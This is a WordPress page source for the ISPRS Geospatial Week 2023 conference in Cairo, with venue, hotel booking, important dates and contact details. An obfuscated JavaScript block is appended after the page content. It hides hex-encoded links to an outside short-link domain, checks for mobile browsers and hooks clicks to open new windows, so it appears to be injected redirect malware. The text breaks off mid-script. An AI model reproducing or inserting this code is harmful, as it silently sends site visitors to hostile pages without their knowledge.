#3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251587234{margin-top: 25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251674466{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 